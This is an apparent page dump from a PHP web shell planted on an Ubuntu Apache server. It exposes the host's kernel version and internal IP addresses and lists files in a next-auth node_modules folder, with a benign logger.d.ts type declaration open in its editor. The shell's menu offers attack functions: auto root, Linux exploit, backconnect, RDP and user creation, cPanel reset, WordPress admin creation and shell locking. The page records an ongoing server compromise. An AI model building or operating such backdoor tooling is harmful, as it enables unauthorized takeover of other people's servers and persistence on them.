Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
next-auth /
utils /
[ HOME SHELL ]
Name
Size
Permission
Action
detect-origin.d.ts
183
B
-rw-rw-r--
detect-origin.d.ts.map
202
B
-rw-rw-r--
detect-origin.js
447
B
-rw-rw-r--
logger.d.ts
1.19
KB
-rw-rw-r--
logger.d.ts.map
783
B
-rw-rw-r--
logger.js
3.72
KB
-rw-rw-r--
merge.d.ts
133
B
-rw-rw-r--
merge.d.ts.map
206
B
-rw-rw-r--
merge.js
690
B
-rw-rw-r--
parse-url.d.ts
534
B
-rw-rw-r--
parse-url.d.ts.map
424
B
-rw-rw-r--
parse-url.js
621
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : logger.d.ts
export declare type WarningCode = "NEXTAUTH_URL" | "NO_SECRET" | "TWITTER_OAUTH_2_BETA" | "DEBUG_ENABLED"; /** * Override any of the methods, and the rest will use the default logger. * * [Documentation](https://next-auth.js.org/configuration/options#logger) */ export interface LoggerInstance extends Record<string, Function> { warn: (code: WarningCode) => void; error: (code: string, /** * Either an instance of (JSON serializable) Error * or an object that contains some debug information. * (Error is still available through `metadata.error`) */ metadata: Error | { error: Error; [key: string]: unknown; }) => void; debug: (code: string, metadata: unknown) => void; } declare const _logger: LoggerInstance; /** * Override the built-in logger with user's implementation. * Any `undefined` level will use the default logger. */ export declare function setLogger(newLogger?: Partial<LoggerInstance>, debug?: boolean): void; export default _logger; /** Serializes client-side log messages and sends them to the server */ export declare function proxyLogger(logger?: LoggerInstance, basePath?: string): LoggerInstance; //# sourceMappingURL=logger.d.ts.map
Close